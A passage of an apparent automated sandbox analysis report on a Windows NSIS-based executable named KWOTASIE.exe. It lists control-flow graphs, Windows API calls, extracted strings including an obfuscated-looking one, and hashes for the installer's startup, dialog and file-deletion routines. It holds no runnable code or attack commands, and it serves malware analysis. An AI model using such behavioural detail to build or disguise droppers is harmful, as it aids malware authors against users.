4701->4705 4704 404987 4702->4704 4717 404203 KiUserCallbackDispatcher 4703->4717 4707 40499c SetDlgItemTextW 4704->4707 4708 40498c 4704->4708 4705->4703 4707->4701 4710 404a6c 20 API calls 4708->4710 4709 4049d9 4709->4660 4711 404609 SendMessageW 4709->4711 4710->4701 4711->4660 4712->4656 4713->4684 4714->4665 4715->4685 4716->4693 4717->4709 4723 401db3 GetDC 4724 402c15 17 API calls 4723->4724 4725 401dc5 GetDeviceCaps MulDiv ReleaseDC 4724->4725 4726 402c15 17 API calls 4725->4726 4727 401df6 4726->4727 4728 40626e 17 API calls 4727->4728 4729 401e33 CreateFontIndirectW 4728->4729 4730 40258c 4729->4730 3774 401735 3775 402c37 17 API calls 3774->3775 3776 40173c SearchPathW 3775->3776 3777 401757 3776->3777 4731 402835 4732 40283d 4731->4732 4733 402841 FindNextFileW 4732->4733 4735 402853 4732->4735 4734 40289a 4733->4734 4733->4735 4737 40624c lstrcpynW 4734->4737 4737->4735 4738 4014b8 4739 4014be 4738->4739 4740 401389 2 API calls 4739->4740 4741 4014c6 4740->4741 3802 40333d SetErrorMode GetVersion 3803 40337c 3802->3803 3804 403382 3802->3804 3805 406626 5 API calls 3803->3805 3806 4065b6 3 API calls 3804->3806 3805->3804 3807 403398 lstrlenA 3806->3807 3807->3804 3808 4033a8 3807->3808 3809 406626 5 API calls 3808->3809 3810 4033af 3809->3810 3811 406626 5 API calls 3810->3811 3812 4033b6 3811->3812 3813 406626 5 API calls 3812->3813 3814 4033c2 #17 OleInitialize SHGetFileInfoW 3813->3814 3893 40624c lstrcpynW 3814->3893 3817 40340e GetCommandLineW 3894 40624c lstrcpynW 3817->3894 3819 403420 GetModuleHandleW 3820 403438 3819->3820 3821 405b4a CharNextW 3820->3821 3822 403447 CharNextW 3821->3822 3823 403571 GetTempPathW 3822->3823 3833 403460 3822->3833 3895 40330c 3823->3895 3825 403589 3826 4035e3 DeleteFileW 3825->3826 3827 40358d GetWindowsDirectoryW lstrcatW 3825->3827 3905 402ec1 GetTickCount GetModuleFileNameW 3826->3905 3828 40330c 12 API calls 3827->3828 3831 4035a9 3828->3831 3829 405b4a CharNextW 3829->3833 3831->3826 3834 4035ad GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 3831->3834 3832 4035f7 3835 4036ae ExitProcess OleUninitialize 3832->3835 3842 405b4a CharNextW 3832->3842 3877 40369a 3832->3877 3833->3829 3838 40355c 3833->3838 3840 40355a 3833->3840 3839 40330c 12 API calls 3834->3839 3836 4037e4 3835->3836 3837 4036c4 3835->3837 3845 403868 ExitProcess 3836->3845 3846 4037ec GetCurrentProcess OpenProcessToken 3836->3846 3844 4058ae MessageBoxIndirectW 3837->3844 3989 40624c lstrcpynW 3838->3989 3847 4035db 3839->3847 3840->3823 3854 403616 3842->3854 3850 4036d2 ExitProcess 3844->3850 3851 403804 LookupPrivilegeValueW AdjustTokenPrivileges 3846->3851 3852 403838 3846->3852 3847->3826 3847->3835 3848 4036aa 3848->3835 3851->3852 3853 406626 5 API calls 3852->3853 3857 40383f 3853->3857 3855 403674 3854->3855 3856 4036da 3854->3856 3859 405c25 18 API calls 3855->3859 3858 405819 5 API calls 3856->3858 3860 403854 ExitWindowsEx 3857->3860 3861 403861 3857->3861 3862 4036df lstrcatW 3858->3862 3863 403680 3859->3863 3860->3845 3860->3861 3864 40140b 2 API calls 3861->3864 3865 4036f0 lstrcatW 3862->3865 3866 4036fb lstrcatW lstrcmpiW 3862->3866 3863->3835 3990 40624c lstrcpynW 3863->3990 3864->3845 3865->3866 3866->3835 3867 403717 3866->3867 3869 403723 3867->3869 3870 40371c 3867->3870 3872 4057fc 2 API calls 3869->3872 3873 40577f 4 API calls 3870->3873 3871 40368f 3991 40624c lstrcpynW 3871->3991 3875 403728 SetCurrentDirectoryW 3872->3875 3876 403721 3873->3876 3878 403743 3875->3878 3879 403738 3875->3879 3876->3875 3933 40395a 3877->3933 3993 40624c lstrcpynW 3878->3993 3992 40624c lstrcpynW 3879->3992 3882 40626e 17 API calls 3883 403782 DeleteFileW 3882->3883 3884 40378f CopyFileW 3883->3884 3890 403751 3883->3890 3884->3890 3885 4037d8 3886 406012 36 API calls 3885->3886 3888 4037df 3886->3888 3887 406012 36 API calls 3887->3890 3888->3835 3889 40626e 17 API calls 3889->3890 3890->3882 3890->3885 3890->3887 3890->3889 3891 405831 2 API calls 3890->3891 3892 4037c3 CloseHandle 3890->3892 3891->3890 3892->3890 3893->3817 3894->3819 3896 4064e0 5 API calls 3895->3896 3898 403318 3896->3898 3897 403322 3897->3825 3898->3897 3899 405b1d 3 API calls 3898->3899 3900 40332a 3899->3900 3901 4057fc 2 API calls 3900->3901 3902 403330 3901->3902 3903 405d6d 2 API calls 3902->3903 3904 40333b 3903->3904 3904->3825 3994 405d3e GetFileAttributesW CreateFileW 3905->3994 3907 402f01 3908 402f11 3907->3908 3995 40624c lstrcpynW 3907->3995 3908->3832 3910 402f27 3911 405b69 2 API calls 3910->3911 3912 402f2d 3911->3912 3996 40624c lstrcpynW 3912->3996 3914 402f38 GetFileSize 3929 403034 3914->3929 3932 402f4f 3914->3932 3916 40303d 3916->3908 3918 40306d GlobalAlloc 3916->3918 4009 4032f5 SetFilePointer 3916->4009 3917 4032df ReadFile 3917->3932 4008 4032f5 SetFilePointer 3918->4008 3921 4030a0 3923 402e5d 6 API calls 3921->3923 3922 403088 3925 4030fa 35 API calls 3922->3925 3923->3908 3924 403056 3926 4032df ReadFile 3924->3926 3930 403094 3925->3930 3928 403061 3926->3928 3927 402e5d 6 API calls 3927->3932 3928->3908 3928->3918 3997 402e5d 3929->3997 3930->3908 3930->3930 3931 4030d1 SetFilePointer 3930->3931 3931->3908 3932->3908 3932->3917 3932->3921 3932->3927 3932->3929 3934 406626 5 API calls 3933->3934 3935 40396e 3934->3935 3936 403974 3935->3936 3937 403986 3935->3937 4018 406193 wsprintfW 3936->4018 3938 40611a 3 API calls 3937->3938 3939 4039b6 3938->3939 3941 4039d5 lstrcatW 3939->3941 3943 40611a 3 API calls 3939->3943 3942 403984 3941->3942 4010 403c30 3942->4010 3943->3941 3946 405c25 18 API calls 3949 403a07 3946->3949 3947 403a9b 3948 405c25 18 API calls 3947->3948 3950 403aa1 3948->3950 3949->3947 3951 40611a 3 API calls 3949->3951 3953 403ab1 LoadImageW 3950->3953 3954 40626e 17 API calls 3950->3954 3952 403a39 3951->3952 3952->3947 3957 403a5a lstrlenW 3952->3957 3960 405b4a CharNextW 3952->3960 3955 403b57 3953->3955 3956 403ad8 RegisterClassW 3953->3956 3954->3953 3959 40140b 2 API calls 3955->3959 3958 403b0e SystemParametersInfoW CreateWindowExW 3956->3958 3988 403b61 3956->3988 3961 403a68 lstrcmpiW 3957->3961 3962 403a8e 3957->3962 3958->3955 3963 403b5d 3959->3963 3964 403a57 3960->3964 3961->3962 3965 403a78 GetFileAttributesW 3961->3965 3966 405b1d 3 API calls 3962->3966 3968 403c30 18 API calls 3963->3968 3963->3988 3964->3957 3967 403a84 3965->3967 3969 403a94 3966->3969 3967->3962 3970 405b69 2 API calls 3967->3970 3971 403b6e 3968->3971 4019 40624c lstrcpynW 3969->4019 3970->3962 3973 403b7a ShowWindow 3971->3973 3974 403bfd 3971->3974 3976 4065b6 3 API calls 3973->3976 3975 405383 5 API calls 3974->3975 3978 403c03 3975->3978 3977 403b92 3976->3977 3979 403ba0 GetClassInfoW 3977->3979 3982 4065b6 3 API calls 3977->3982 3980 403c07 3978->3980 3981 403c1f 3978->3981 3984 403bb4 GetClassInfoW RegisterClassW 3979->3984 3985 403bca DialogBoxParamW 3979->3985 3987 40140b 2 API calls 3980->3987 3980->3988 3983 40140b 2 API calls 3981->3983 3982->3979 3983->3988 3984->3985 3986 40140b 2 API calls 3985->3986 3986->3988 3987->3988 3988->3848 3989->3840 3990->3871 3991->3877 3992->3878 3993->3890 3994->3907 3995->3910 3996->3914 3998 402e66 3997->3998 3999 402e7e 3997->3999 4000 402e76 3998->4000 4001 402e6f DestroyWindow 3998->4001 4002 402e86 3999->4002 4003 402e8e GetTickCount 3999->4003 4000->3916 4001->4000 4004 406662 2 API calls 4002->4004 4005 402e9c CreateDialogParamW ShowWindow 4003->4005 4006 402ebf 4003->4006 4007 402e8c 4004->4007 4005->4006 4006->3916 4007->3916 4008->3922 4009->3924 4011 403c44 4010->4011 4020 406193 wsprintfW 4011->4020 4013 403cb5 4014 403ce9 18 API calls 4013->4014 4016 403cba 4014->4016 4015 4039e5 4015->3946 4016->4015 4017 40626e 17 API calls 4016->4017 4017->4016 4018->3942 4019->3947 4020->4013

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 0 40333d-40337a SetErrorMode GetVersion 1 40337c-403384 call 406626 0->1 2 40338d 0->2 1->2 8 403386 1->8 3 403392-4033a6 call 4065b6 lstrlenA 2->3 9 4033a8-4033c4 call 406626 * 3 3->9 8->2 16 4033d5-403436 #17 OleInitialize SHGetFileInfoW call 40624c GetCommandLineW call 40624c GetModuleHandleW 9->16 17 4033c6-4033cc 9->17 24 403440-40345a call 405b4a CharNextW 16->24 25 403438-40343f 16->25 17->16 22 4033ce 17->22 22->16 28 403460-403466 24->28 29 403571-40358b GetTempPathW call 40330c 24->29 25->24 31 403468-40346d 28->31 32 40346f-403473 28->32 36 4035e3-4035fd DeleteFileW call 402ec1 29->36 37 40358d-4035ab GetWindowsDirectoryW lstrcatW call 40330c 29->37 31->31 31->32 34 403475-403479 32->34 35 40347a-40347e 32->35 34->35 38 403484-40348a 35->38 39 40353d-40354a call 405b4a 35->39 57 403603-403609 36->57 58 4036ae-4036be ExitProcess OleUninitialize 36->58 37->36 54 4035ad-4035dd GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 40330c 37->54 43 4034a5-4034de 38->43 44 40348c-403494 38->44 55 40354c-40354d 39->55 56 40354e-403554 39->56 47 4034e0-4034e5 43->47 48 4034fb-403535 43->48 45 403496-403499 44->45 46 40349b 44->46 45->43 45->46 46->43 47->48 52 4034e7-4034ef 47->52 48->39 53 403537-40353b 48->53 61 4034f1-4034f4 52->61 62 4034f6 52->62 53->39 63 40355c-40356a call 40624c 53->63 54->36 54->58 55->56 56->28 65 40355a 56->65 66 40369e-4036a5 call 40395a 57->66 67 40360f-40361a call 405b4a 57->67 59 4037e4-4037ea 58->59 60 4036c4-4036d4 call 4058ae ExitProcess 58->60 72 403868-403870 59->72 73 4037ec-403802 GetCurrentProcess OpenProcessToken 59->73 61->48 61->62 62->48 75 40356f 63->75 65->75 77 4036aa 66->77 83 403668-403672 67->83 84 40361c-403651 67->84 78 403872 72->78 79 403876-40387a ExitProcess 72->79 81 403804-403832 LookupPrivilegeValueW AdjustTokenPrivileges 73->81 82 403838-403846 call 406626 73->82 75->29 77->58 78->79 81->82 94 403854-40385f ExitWindowsEx 82->94 95 403848-403852 82->95 87 403674-403682 call 405c25 83->87 88 4036da-4036ee call 405819 lstrcatW 83->88 86 403653-403657 84->86 90 403660-403664 86->90 91 403659-40365e 86->91 87->58 104 403684-40369a call 40624c * 2 87->104 102 4036f0-4036f6 lstrcatW 88->102 103 4036fb-403715 lstrcatW lstrcmpiW 88->103 90->86 97 403666 90->97 91->90 91->97 94->72 96 403861-403863 call 40140b 94->96 95->94 95->96 96->72 97->83 102->103 103->58 105 403717-40371a 103->105 104->66 107 403723 call 4057fc 105->107 108 40371c-403721 call 40577f 105->108 113 403728-403736 SetCurrentDirectoryW 107->113 108->113 116 403743-40376c call 40624c 113->116 117 403738-40373e call 40624c 113->117 121 403771-40378d call 40626e DeleteFileW 116->121 117->116 124 4037ce-4037d6 121->124 125 40378f-40379f CopyFileW 121->125 124->121 126 4037d8-4037df call 406012 124->126 125->124 127 4037a1-4037c1 call 406012 call 40626e call 405831 125->127 126->58 127->124 136 4037c3-4037ca CloseHandle 127->136 136->124
              APIs
              • SetErrorMode.KERNELBASE ref: 00403360
              • GetVersion.KERNEL32 ref: 00403366
              • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403399
              • #17.COMCTL32(?,00000006,00000008,0000000A), ref: 004033D6
              • OleInitialize.OLE32(00000000), ref: 004033DD
              • SHGetFileInfoW.SHELL32(004216A8,00000000,?,000002B4,00000000), ref: 004033F9
              • GetCommandLineW.KERNEL32(00429200,NSIS Error,?,00000006,00000008,0000000A), ref: 0040340E
              • GetModuleHandleW.KERNEL32(00000000,"C:\Users\user\Desktop\KWOTASIE.exe",00000000,?,00000006,00000008,0000000A), ref: 00403421
              • CharNextW.USER32(00000000,"C:\Users\user\Desktop\KWOTASIE.exe",00000020,?,00000006,00000008,0000000A), ref: 00403448
                • Part of subcall function 00406626: GetModuleHandleA.KERNEL32(?,00000020,?,004033AF,0000000A), ref: 00406638
                • Part of subcall function 00406626: GetProcAddress.KERNEL32(00000000,?), ref: 00406653
              • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 00403582
              • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000006,00000008,0000000A), ref: 00403593
              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 0040359F
              • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 004035B3
              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 004035BB
              • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 004035CC
              • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 004035D4
              • DeleteFileW.KERNELBASE(1033,?,00000006,00000008,0000000A), ref: 004035E8
                • Part of subcall function 0040624C: lstrcpynW.KERNEL32(?,?,00000400,0040340E,00429200,NSIS Error,?,00000006,00000008,0000000A), ref: 00406259
              • ExitProcess.KERNEL32(00000006,?,00000006,00000008,0000000A), ref: 004036AE
              • OleUninitialize.OLE32(00000006,?,00000006,00000008,0000000A), ref: 004036B3
              • ExitProcess.KERNEL32 ref: 004036D4
              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu), ref: 004036E7
              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A26C), ref: 004036F6
              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp), ref: 00403701
              • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\KWOTASIE.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 0040370D
              • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 00403729
              • DeleteFileW.KERNEL32(00420EA8,00420EA8,?,0042B000,00000008,?,00000006,00000008,0000000A), ref: 00403783
              • CopyFileW.KERNEL32(C:\Users\user\Desktop\KWOTASIE.exe,00420EA8,00000001,?,00000006,00000008,0000000A), ref: 00403797
              • CloseHandle.KERNEL32(00000000,00420EA8,00420EA8,?,00420EA8,00000000,?,00000006,00000008,0000000A), ref: 004037C4
              • GetCurrentProcess.KERNEL32(00000028,0000000A,00000006,00000008,0000000A), ref: 004037F3
              • OpenProcessToken.ADVAPI32(00000000), ref: 004037FA
              • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 0040380F
              • AdjustTokenPrivileges.ADVAPI32 ref: 00403832
              • ExitWindowsEx.USER32(00000002,80040002), ref: 00403857
              • ExitProcess.KERNEL32 ref: 0040387A
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2039766709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.2039747567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039784700.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2040173938.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2040173938.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_KWOTASIE.jbxd
              Similarity
              • API ID: Processlstrcat$ExitFile$Handle$CurrentDeleteDirectoryEnvironmentModulePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
              • String ID: "C:\Users\user\Desktop\KWOTASIE.exe"$,nsorrowful Niela Riefs C.lli"s,mbolpBin.esoSlo chw.timlee .ilhurXe.oposSen.omhPrer.fe Un,aml .ilkelSk,bsb.Norm.leAtomi xDi.ette $.tmp$1033$C:\Users\user\AppData\Local\Innoxious$C:\Users\user\AppData\Local\Innoxious\olivilin$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\KWOTASIE.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
              • API String ID: 354199918-3934075578
              • Opcode ID: d2a13487a049f8695112171eabf7473e6d565728a0202d7647594f6489cd5a4d
              • Instruction ID: 8796dd7fda2277e74c31c2c32d36de8c434ed5469641edba7c3d6f01ab9f589a
              • Opcode Fuzzy Hash: d2a13487a049f8695112171eabf7473e6d565728a0202d7647594f6489cd5a4d
              • Instruction Fuzzy Hash: 8AD11470600310ABD7207F759D45B2B3AACEB4074AF10447EF881B62D1DB7E8956CB6E

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 137 4053ef-40540a 138 405410-4054d7 GetDlgItem * 3 call 404216 call 404b4d GetClientRect GetSystemMetrics SendMessageW * 2 137->138 139 405599-4055a0 137->139 159 4054f5-4054f8 138->159 160 4054d9-4054f3 SendMessageW * 2 138->160 141 4055a2-4055c4 GetDlgItem CreateThread FindCloseChangeNotification 139->141 142 4055ca-4055d7 139->142 141->142 144 4055f5-4055ff 142->144 145 4055d9-4055df 142->145 149 405601-405607 144->149 150 405655-405659 144->150 147 4055e1-4055f0 ShowWindow * 2 call 404216 145->147 148 40561a-405623 call 404248 145->148 147->144 163 405628-40562c 148->163 154 405609-405615 call 4041ba 149->154 155 40562f-40563f ShowWindow 149->155 150->148 152 40565b-405661 150->152 152->148 161 405663-405676 SendMessageW 152->161 154->148 157 405641-40564a call 4052b0 155->157 158 40564f-405650 call 4041ba 155->158 157->158 158->150 166 405508-40551f call 4041e1 159->166 167 4054fa-405506 SendMessageW 159->167 160->159 168 405778-40577a 161->168 169 40567c-4056a7 CreatePopupMenu call 40626e AppendMenuW 161->169 176 405521-405535 ShowWindow 166->176 177 405555-405576 GetDlgItem SendMessageW 166->177 167->166 168->163 174 4056a9-4056b9 GetWindowRect 169->174 175 4056bc-4056d1 TrackPopupMenu 169->175 174->175 175->168 179 4056d7-4056ee 175->179 180 405544 176->180 181 405537-405542 ShowWindow 176->181 177->168 178 40557c-405594 SendMessageW * 2 177->178 178->168 182 4056f3-40570e SendMessageW 179->182 183 40554a-405550 call 404216 180->183 181->183 182->182 184 405710-405733 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 182->184 183->177 186 405735-40575c SendMessageW 184->186 186->186 187 40575e-405772 GlobalUnlock SetClipboardData CloseClipboard 186->187 187->168
              APIs
              • GetDlgItem.USER32(?,00000403), ref: 0040544D
              • GetDlgItem.USER32(?,000003EE), ref: 0040545C
              • GetClientRect.USER32(?,?), ref: 00405499
              • GetSystemMetrics.USER32(00000002), ref: 004054A0
              • SendMessageW.USER32(?,00001061,00000000,?), ref: 004054C1
              • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004054D2
              • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004054E5
              • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004054F3
              • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405506
              • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405528
              • ShowWindow.USER32(?,00000008), ref: 0040553C
              • GetDlgItem.USER32(?,000003EC), ref: 0040555D
              • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040556D
              • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405586
              • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405592
              • GetDlgItem.USER32(?,000003F8), ref: 0040546B
                • Part of subcall function 00404216: SendMessageW.USER32(00000028,?,00000001,00404041), ref: 00404224
              • GetDlgItem.USER32(?,000003EC), ref: 004055AF
              • CreateThread.KERNELBASE(00000000,00000000,Function_00005383,00000000), ref: 004055BD
              • FindCloseChangeNotification.KERNELBASE(00000000), ref: 004055C4
              • ShowWindow.USER32(00000000), ref: 004055E8
              • ShowWindow.USER32(?,00000008), ref: 004055ED
              • ShowWindow.USER32(00000008), ref: 00405637
              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040566B
              • CreatePopupMenu.USER32 ref: 0040567C
              • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405690
              • GetWindowRect.USER32(?,?), ref: 004056B0
              • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004056C9
              • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405701
              • OpenClipboard.USER32(00000000), ref: 00405711
              • EmptyClipboard.USER32 ref: 00405717
              • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405723
              • GlobalLock.KERNEL32(00000000), ref: 0040572D
              • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405741
              • GlobalUnlock.KERNEL32(00000000), ref: 00405761
              • SetClipboardData.USER32(0000000D,00000000), ref: 0040576C
              • CloseClipboard.USER32 ref: 00405772
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2039766709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.2039747567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039784700.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2040173938.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2040173938.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_KWOTASIE.jbxd
              Similarity
              • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendChangeClientDataEmptyFindLockMetricsNotificationOpenSystemThreadTrackUnlock
              • String ID: Lx${$6B
              • API String ID: 4154960007-3539035231
              • Opcode ID: bafaae828d30907193abfb7d0b2ebba1375cd8af34f5706ff9aabcfc974c4f7c
              • Instruction ID: d3ec127817543c8dcb48433ae4040966c093085d210dffb8a3526856162b3191
              • Opcode Fuzzy Hash: bafaae828d30907193abfb7d0b2ebba1375cd8af34f5706ff9aabcfc974c4f7c
              • Instruction Fuzzy Hash: B1B14A70900609FFDB119FA1DD89AAE7B79FB44354F00403AFA45B61A0CB754E52DF68

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 497 40595a-405980 call 405c25 500 405982-405994 DeleteFileW 497->500 501 405999-4059a0 497->501 502 405b16-405b1a 500->502 503 4059a2-4059a4 501->503 504 4059b3-4059c3 call 40624c 501->504 505 405ac4-405ac9 503->505 506 4059aa-4059ad 503->506 512 4059d2-4059d3 call 405b69 504->512 513 4059c5-4059d0 lstrcatW 504->513 505->502 508 405acb-405ace 505->508 506->504 506->505 510 405ad0-405ad6 508->510 511 405ad8-405ae0 call 40658f 508->511 510->502 511->502 521 405ae2-405af6 call 405b1d call 405912 511->521 514 4059d8-4059dc 512->514 513->514 517 4059e8-4059ee lstrcatW 514->517 518 4059de-4059e6 514->518 520 4059f3-405a0f lstrlenW FindFirstFileW 517->520 518->517 518->520 522 405a15-405a1d 520->522 523 405ab9-405abd 520->523 537 405af8-405afb 521->537 538 405b0e-405b11 call 4052b0 521->538 526 405a3d-405a51 call 40624c 522->526 527 405a1f-405a27 522->527 523->505 525 405abf 523->525 525->505 539 405a53-405a5b 526->539 540 405a68-405a73 call 405912 526->540 529 405a29-405a31 527->529 530 405a9c-405aac FindNextFileW 527->530 529->526 533 405a33-405a3b 529->533 530->522 536 405ab2-405ab3 FindClose 530->536 533->526 533->530 536->523 537->510 543 405afd-405b0c call 4052b0 call 406012 537->543 538->502 539->530 544 405a5d-405a66 call 40595a 539->544 549 405a94-405a97 call 4052b0 540->549 550 405a75-405a78 540->550 543->502 544->530 549->530 553 405a7a-405a8a call 4052b0 call 406012 550->553 554 405a8c-405a92 550->554 553->530 554->530
              APIs
              • DeleteFileW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,75923420,00000000), ref: 00405983
              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsy202D.tmp\*.*,\*.*), ref: 004059CB
              • lstrcatW.KERNEL32(?,0040A014), ref: 004059EE
              • lstrlenW.KERNEL32(?,?,0040A014,?,C:\Users\user\AppData\Local\Temp\nsy202D.tmp\*.*,?,?,C:\Users\user\AppData\Local\Temp\,75923420,00000000), ref: 004059F4
              • FindFirstFileW.KERNELBASE(C:\Users\user\AppData\Local\Temp\nsy202D.tmp\*.*,?,?,?,0040A014,?,C:\Users\user\AppData\Local\Temp\nsy202D.tmp\*.*,?,?,C:\Users\user\AppData\Local\Temp\,75923420,00000000), ref: 00405A04
              • FindNextFileW.KERNELBASE(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405AA4
              • FindClose.KERNELBASE(00000000), ref: 00405AB3
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2039766709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.2039747567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039784700.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2040173938.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2040173938.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_KWOTASIE.jbxd
              Similarity
              • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
              • String ID: "C:\Users\user\Desktop\KWOTASIE.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsy202D.tmp\*.*$\*.*
              • API String ID: 2035342205-2179781869
              • Opcode ID: 605fd81be1f41f38ce9b100556876732106d54cf1fc53f7772c9c8b4b7d1963f
              • Instruction ID: a8a76f5088e9b8e84a0c744efebc89a786f36fdc765849bba2b15b9d7042df22
